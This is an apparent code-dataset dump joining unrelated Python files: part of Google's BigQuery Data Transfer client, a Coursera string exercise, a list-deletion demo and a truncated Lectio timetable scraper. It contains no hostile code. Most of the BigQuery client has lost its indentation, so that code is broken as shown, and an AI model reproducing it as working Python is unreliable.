specifies where data should be stored. When a new
transfer configuration is created, the specified
destination_dataset_id is created when needed and
shared with the appropriate data source service
account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.GetTransferConfigRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.GetTransferConfigRequest):
request = datatransfer.GetTransferConfigRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_transfer_config]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_transfer_configs(
self,
request: datatransfer.ListTransferConfigsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferConfigsPager:
r"""Returns information about all data transfers in the
project.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferConfigsRequest):
The request object. A request to list data transfers
configured for a BigQuery project.
parent (str):
Required. The BigQuery project id for which data sources
should be returned: ``projects/{project_id}`` or
``projects/{project_id}/locations/{location_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferConfigsPager:
The returned list of pipelines in the
project.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferConfigsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferConfigsRequest):
request = datatransfer.ListTransferConfigsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_configs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferConfigsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def schedule_transfer_runs(
self,
request: datatransfer.ScheduleTransferRunsRequest = None,
*,
parent: str = None,
start_time: timestamp.Timestamp = None,
end_time: timestamp.Timestamp = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.ScheduleTransferRunsResponse:
r"""Creates transfer runs for a time range [start_time, end_time].
For each date - or whatever granularity the data source supports
- in the range, one transfer run is created. Note that runs are
created per UTC time in the time range. DEPRECATED: use
StartManualTransferRuns instead.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ScheduleTransferRunsRequest):
The request object. A request to schedule transfer runs
for a time range.
parent (str):
Required. Transfer configuration name in the form:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Required. Start time of the range of transfer runs. For
example, ``"2017-05-25T00:00:00+00:00"``.
This corresponds to the ``start_time`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
end_time (google.protobuf.timestamp_pb2.Timestamp):
Required. End time of the range of transfer runs. For
example, ``"2017-05-30T00:00:00+00:00"``.
This corresponds to the ``end_time`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.ScheduleTransferRunsResponse:
A response to schedule transfer runs
for a time range.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, start_time, end_time])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ScheduleTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ScheduleTransferRunsRequest):
request = datatransfer.ScheduleTransferRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if start_time is not None:
request.start_time = start_time
if end_time is not None:
request.end_time = end_time
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.schedule_transfer_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def start_manual_transfer_runs(
self,
request: datatransfer.StartManualTransferRunsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.StartManualTransferRunsResponse:
r"""Start manual transfer runs to be executed now with schedule_time
equal to current time. The transfer runs can be created for a
time range where the run_time is between start_time (inclusive)
and end_time (exclusive), or for a specific run_time.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.StartManualTransferRunsRequest):
The request object. A request to start manual transfer
runs.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.StartManualTransferRunsResponse:
A response to start manual transfer
runs.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.StartManualTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.StartManualTransferRunsRequest):
request = datatransfer.StartManualTransferRunsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.start_manual_transfer_runs
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get_transfer_run(
self,
request: datatransfer.GetTransferRunRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transfer.TransferRun:
r"""Returns information about the particular transfer
run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.GetTransferRunRequest):
The request object. A request to get data transfer run
information.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.TransferRun:
Represents a data transfer run.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.GetTransferRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.GetTransferRunRequest):
request = datatransfer.GetTransferRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_transfer_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_transfer_run(
self,
request: datatransfer.DeleteTransferRunRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the specified transfer run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.DeleteTransferRunRequest):
The request object. A request to delete data transfer
run information.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.DeleteTransferRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.DeleteTransferRunRequest):
request = datatransfer.DeleteTransferRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_transfer_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def list_transfer_runs(
self,
request: datatransfer.ListTransferRunsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferRunsPager:
r"""Returns information about running and completed jobs.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferRunsRequest):
The request object. A request to list data transfer
runs. UI can use this method to show/filter specific
data transfer runs. The data source can use this method
to request all scheduled transfer runs.
parent (str):
Required. Name of transfer configuration for which
transfer runs should be retrieved. Format of transfer
configuration resource name is:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferRunsPager:
The returned list of pipelines in the
project.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferRunsRequest):
request = datatransfer.ListTransferRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferRunsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def list_transfer_logs(
self,
request: datatransfer.ListTransferLogsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferLogsPager:
r"""Returns user facing log messages for the data
transfer run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferLogsRequest):
The request object. A request to get user facing log
messages associated with data transfer run.
parent (str):
Required. Transfer run name in the form:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferLogsPager:
The returned list transfer run
messages.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferLogsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferLogsRequest):
request = datatransfer.ListTransferLogsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_logs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferLogsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def check_valid_creds(
self,
request: datatransfer.CheckValidCredsRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.CheckValidCredsResponse:
r"""Returns true if valid credentials exist for the given
data source and requesting user.
Some data sources doesn't support service account, so we
need to talk to them on behalf of the end user. This API
just checks whether we have OAuth token for the
particular user, which is a pre-requisite before user
can create a transfer config.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.CheckValidCredsRequest):
The request object. A request to determine whether the
user has valid credentials. This method is used to limit
the number of OAuth popups in the user interface. The
user id is inferred from the API call context.
If the data source has the Google+ authorization type,
this method returns false, as it cannot be determined
whether the credentials are already valid merely based
on the user id.
name (str):
Required. The data source in the form:
``projects/{project_id}/dataSources/{data_source_id}``
or
``projects/{project_id}/locations/{location_id}/dataSources/{data_source_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.CheckValidCredsResponse:
A response indicating whether the
credentials exist and are valid.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.CheckValidCredsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.CheckValidCredsRequest):
request = datatransfer.CheckValidCredsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.check_valid_creds]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
# Advertise the installed library version in client metadata; fall back to
# an unversioned ClientInfo when the distribution metadata is unavailable
# (e.g. when running from a source checkout).
try:
    _gapic_version = pkg_resources.get_distribution(
        "google-cloud-bigquery-datatransfer",
    ).version
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
else:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=_gapic_version,
    )

__all__ = ("DataTransferServiceClient",)
| [
"noreply@github.com"
] | gopinath678.noreply@github.com |
33a2426cc882562c11052d366fdcd3b93f062ae7 | 4fc1193295eaa239e62994d75f13f5a4c42621ce | /An Introduction to Interactive Programming in Python (Part 1)/Week 0 - Statements, expressions, variables/19.py | 71d4f308773971cb3d31bea2b0f4f9beeb8be3d2 | [] | no_license | Mahmoud-Shosha/Fundamentals-of-Computing-Specialization-Coursera | 296ec8a586a81ec51309c5c214ab0829f0f643be | 8f2339918547de43038a6ceffd815199ba365ff9 | refs/heads/master | 2020-12-08T20:32:43.559287 | 2020-05-11T19:47:52 | 2020-05-11T19:47:52 | 233,085,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,392 | py | """
Given the pre-defined variables name (a string) and age (a number), write an assignment statement
that defines a variable statement whose value is the string "% is % years old."
where the percents should be replaced by name and the string form of age.
"""
# Compute the statement about a person's name and age, given the person's name and age.
###################################################
# Tests
# Student should uncomment ONLY ONE of the following at a time.
# Test 1 - Select the following lines and use ctrl+shift+k to uncomment.
name = "Joe Warren"
age = 52
# Test 2 - Select the following lines and use ctrl+shift+k to uncomment.
#name = "Scott Rixner"
#age = 40
# Test 3 - Select the following lines and use ctrl+shift+k to uncomment.
#name = "John Greiner"
#age = 46
###################################################
# Name and age formula
# Student should enter formula on the next line.
statement = name + " is " + str(age) + " years old."
###################################################
# Test output
# Student should not change this code.
print statement
###################################################
# Expected output
# Student should look at the following comments and compare to printed output.
# Test 1 output:
#Joe Warren is 52 years old.
# Test 2 output:
#Scott Rixner is 40 years old.
# Test 3 output:
#John Greiner is 46 years old.
| [
"mahmoud.aboelsoud.p@gmail.com"
] | mahmoud.aboelsoud.p@gmail.com |
63ba5f08bc473d75ea7024b86e0a8b57bd844fe2 | 6e6b019129c572075f962481a5b53a9d0bf8b85c | /delete_methods_list.py | f97b67af5905df1586078544380b7020b7a7dfac | [] | no_license | rathinitish29/Python | de291fde14c22a5fed2e965ce650a9c6f723a1c4 | 24e0cf24a992642de6e05b63eddb66faeb41e9c1 | refs/heads/master | 2022-12-08T01:09:09.748555 | 2020-08-24T16:40:29 | 2020-08-24T16:40:29 | 283,421,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # common methods to delete data from list
fruit = ['mango', 'banana','apple','orange']
print(fruit)
#pop() method
fruit.pop(1)
print(fruit)
#del[] operator
del fruit[1]
print(fruit)
#remove()method
fruit.remove('mango')
print(fruit)
#to add data = append,insert,extend
#to delete = pop,del,remove | [
"noreply@github.com"
] | rathinitish29.noreply@github.com |
ec27c3e337d387838915a713ed556f02f4d35e8c | 2d4e3eb624975b30a034f00b081cdf77fd76f205 | /scrapers/timetable.py | b2c70b523220a03296421b4c2798e5dfdd471441 | [
"MIT"
] | permissive | boh1996/LectioAPI | 14060566c6cac3711ef672a1366d4959dceb8b4c | 2dcf5928d994b2a407040cabf59db799e8880025 | refs/heads/master | 2021-01-18T22:26:55.982729 | 2016-04-17T13:05:14 | 2016-04-17T13:05:14 | 12,767,098 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,891 | py | #!/usr/bin/python
# -*- coding: utf8 -*-
from bs4 import BeautifulSoup as Soup
import urls
import re
import proxy
from datetime import *
import time
from time import mktime
import functions
from pytz import timezone
import authenticate
#s2module-bg s2time-off
def sameDay(date, dayOfWeek, week, year):
	"""Return True if *date* falls on the given weekday of the given
	week of the given year.

	Args:
		date (datetime): The datetime to test (only its date part is compared).
		dayOfWeek: Weekday as used by strptime's %w (0 = Sunday .. 6 = Saturday).
		week: Week number as used by %W (Monday-first weeks; week 1 starts
			at the year's first Monday).
		year: Four-digit year.

	Returns:
		bool: True when the computed day and *date* share the same calendar date.
	"""
	# Parse the target day directly with datetime.strptime at a fixed noon
	# time, instead of the old time.strptime -> mktime -> fromtimestamp
	# round-trip, which needlessly went through the local-time epoch.
	theDay = datetime.strptime(
		"%s %s %s %s %s" % ("12", "00", dayOfWeek, week, year),
		"%H %M %w %W %Y",
	)
	return theDay.date() == date.date()
def timetable( config, url, week, year, session = False ):
if session == False:
cookies = {}
else:
if session == True:
session = authenticate.authenticate(config)
# Insert the session information from the auth function
cookies = {
"lecmobile" : "0",
"ASP.NET_SessionId" : session["ASP.NET_SessionId"],
"LastLoginUserName" : session["LastLoginUserName"],
"lectiogsc" : session["lectiogsc"],
"LectioTicket" : session["LectioTicket"]
}
# Sorting settings
settings = {
}
# Insert User-agent headers and the cookie information
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
"Content-Type" : "application/x-www-form-urlencoded",
"Host" : "www.lectio.dk",
"Origin" : "https://www.lectio.dk",
"Cookie" : functions.implode(cookies, "{{index}}={{value}}", "; ")
}
response = proxy.session.get(url, headers=headers)
html = response.text
soup = Soup(html)
if soup.find("table", attrs={"id" : "s_m_Content_Content_SkemaNyMedNavigation_skema_skematabel"}) is None:
return {
"status" : False,
"error" : "Data not found"
}
# Fetch all rows in the table
rows = soup.find("table", attrs={"id" : "s_m_Content_Content_SkemaNyMedNavigation_skema_skematabel"}).findAll("tr")
# Fetch module info, to make it possible to draw a complete timetable
moduleInfo = []
moduleInfoProg = re.compile(r"(?P<module_number>.*)\. (?P<start_time>.*) - (?P<end_time>.*)")
for row in soup.findAll("div", attrs={"class" : "s2module-info"}):
moduleInfoGroups = moduleInfoProg.match(row.text.strip().replace("modul", ""))
if not moduleInfoGroups is None:
start = moduleInfoGroups.group("start_time")
if len(start) < 5:
start = "0" + start
end = moduleInfoGroups.group("end_time")
if len(end) < 5:
end = "0" + end
moduleInfo.append({
"module" : moduleInfoGroups.group("module_number"),
"start" : start,
"end" : end
})
# Fetch the general information celss
generalInformationDays = rows[2].findAll("td")
generalInformation = []
holidayElements = []
# Loop through all the cells, and look for information
index = 0
for tdRow in generalInformationDays:
index = index+1
dayOfWeek = index-1
if dayOfWeek == 7:
dayOfWeek = 0
if index > 1:
row = tdRow.findAll("a")
# Loop over the link elements, in the cell
if not row == None and len(row) > 0:
for element in row:
# The time module uses "0" as the first week of the year
if int(week) == 1:
timeWeek = 0
else:
# Subtract one, because 0 is the first week
timeWeek = int(week)-1
date = time.strptime("%s %s %s" % (str(dayOfWeek),str(timeWeek), str(year)),"%w %W %Y")
content = element.find("div", attrs={"class" : "s2skemabrikcontent"}).findAll("span")[1]
div = element.find("div", attrs={"class" : "s2skemabrikcontent"})
href = None
# If the a tag has a href, fetch it
try:
href = element["href"]
except BaseException:
pass
if href == None:
generalInformation.append({
"message" : unicode(content.text),
"date" : datetime.fromtimestamp(mktime(date)),
"school_id" : str(config["school_id"]),
"branch_id" : str(config["branch_id"]),
"term" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"week" : week,
"year" : year
})
else:
# Compile the regular expression
prog = re.compile(r"\/lectio\/(?P<school_id>[0-9]*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>[0-9]*)&(?P<prev_url>.*)")
activityGroups = prog.match(element["href"])
generalInformation.append({
"message" : unicode(content.text),
"activity_id" : activityGroups.group("activity_id"),
"status" : "changed" if "s2changed" in div["class"] else "cancelled" if "s2cancelled" in div["class"] else "normal",
"date" : datetime.fromtimestamp(mktime(date)),
"school_id" : str(config["school_id"]),
"branch_id" : str(config["branch_id"]),
"term" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"week" : week,
"year" : year
})
# Find all the day elements
timeElements = []
headers = []
headerRows = rows[1].findAll("td")
headerRows.pop(0)
headerProg = re.compile(ur"(?P<day_name>.*) \((?P<day>.*)\/(?P<month>.*)\)")
for row in headerRows:
headerGroups = headerProg.match(row.text)
headerYear = year
if not headerGroups is None:
if int(week) == 1 and int(headerGroups.group("month")) == 12:
headerYear = str(int(year) - 1)
headers.append({
"day" : headerGroups.group("day_name"),
"date" : datetime.strptime("%s-%s-%s %s" % (functions.zeroPadding(headerGroups.group("day")), functions.zeroPadding(headerGroups.group("month")), headerYear, "12:00"), "%d-%m-%Y %H:%M")
})
dayElements = rows[3].findAll("td")
dayElements.pop(0)
# Loop over the days
index = 0
dayOfWeek = 1
for dayElement in dayElements:
# Increment the day
index = index+1
# Test
dayOfWeek = index
if dayOfWeek == 7:
dayOfWeek = 0
# The time module uses "0" as the first week of the year
if int(week) == 1:
timeWeek = 0
else:
# Subtract one, because 0 is the first week
timeWeek = int(week)-1
# Find all the "a" tags, representing timetable elements
timetableElements = dayElement.findAll("a")
moduleIndex = 1
for checkElement in dayElement.findAll(attrs={"class" : "s2module-bg"}):
if "s2time-off" in checkElement["class"]:
# Get time from module info elements
holidayElements.append({
"start" : datetime.strptime("%s-%s-%s %s" % (headers[index-1]["date"].strftime("%d"), headers[index-1]["date"].strftime("%m"), headers[index-1]["date"].strftime("%Y"), moduleInfo[moduleIndex-1]["start"]), "%d-%m-%Y %H:%M"),
"end" : datetime.strptime("%s-%s-%s %s" % (headers[index-1]["date"].strftime("%d"), headers[index-1]["date"].strftime("%m"), headers[index-1]["date"].strftime("%Y"), moduleInfo[moduleIndex-1]["end"]), "%d-%m-%Y %H:%M")
})
moduleIndex = moduleIndex + 1
# Loop over the timetable elements
for timetableElement in timetableElements:
#The type of the event, "private" or "school"
type = None
# Locate the different types of information in the url, and find the different RegEx groups
expressions = [
{"type" : "private", "expression" : r"\/lectio\/(?P<school_id>[0-9]*)\/privat_aftale.aspx\?aftaleid=(?P<activity_id>[0-9]*)"},
{"type" : "school", "expression" : r"\/lectio\/(?P<school_id>[0-9]*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>[0-9]*)&(?P<prev_url>.*)"},
{"type" : "outgoing_censor", "expression" : r"\/lectio\/(?P<school_id>.*)\/proevehold.aspx\?type=udgcensur&outboundCensorID=(?P<outbound_censor_id>.*)&prevurl=(?P<prev_url>.*)"},
{"type" : "exam", "expression" : r"\/lectio\/(?P<school_id>.*)\/proevehold.aspx\?type=proevehold&ProeveholdId=(?P<test_team_id>.*)&prevurl=(?P<prev_url>.*)"}
]
# Loop over the expressions
groups = []
type = "other"
for expressionObject in expressions:
prog = re.compile(expressionObject["expression"])
if prog.match(timetableElement["href"]):
groups = prog.match(timetableElement["href"])
type = expressionObject["type"]
# Locate the status div
div = timetableElement.find("div", attrs={"class" : "s2skemabrikcontent"})
# A list of the teachers
teachers = []
# A list of the assigned teams
teams = []
# Find all the info span elements
infoSpanObjects = timetableElement.findAll("span")
# Loop over the Info spans
for span in infoSpanObjects:
id = None
# Test if property exists
try:
id = span["lectiocontextcard"]
except BaseException:
pass
if not id == None:
# Team
if span["lectiocontextcard"][0] == "H":
# Append the team
teams.append({
"context_card_id" : span["lectiocontextcard"],
"title" : unicode(span.text),
"team_id" : span["lectiocontextcard"].replace("HE", "")
})
# Teacher
elif span["lectiocontextcard"][0] == "T":
teachers.append({
"abbrevation" : unicode(span.text),
"context_card_id" : span["lectiocontextcard"],
"teacher_id" : span["lectiocontextcard"].replace("T", "")
})
# Get the titletext where to extract start and end times from
title = timetableElement["title"]
# Match the title, to extract the start and end time
timeProg = re.compile(r"(?P<start_hour>[0-9]*):(?P<start_minute>[0-9]*) til (?P<end_hour>[0-9]*):(?P<end_minute>[0-9]*)")
timeGroups = timeProg.search(unicode(title).encode("utf8"), re.MULTILINE)
# Get the "main sections" separated by a double return \n\n
mainSections = title.split("\n\n")
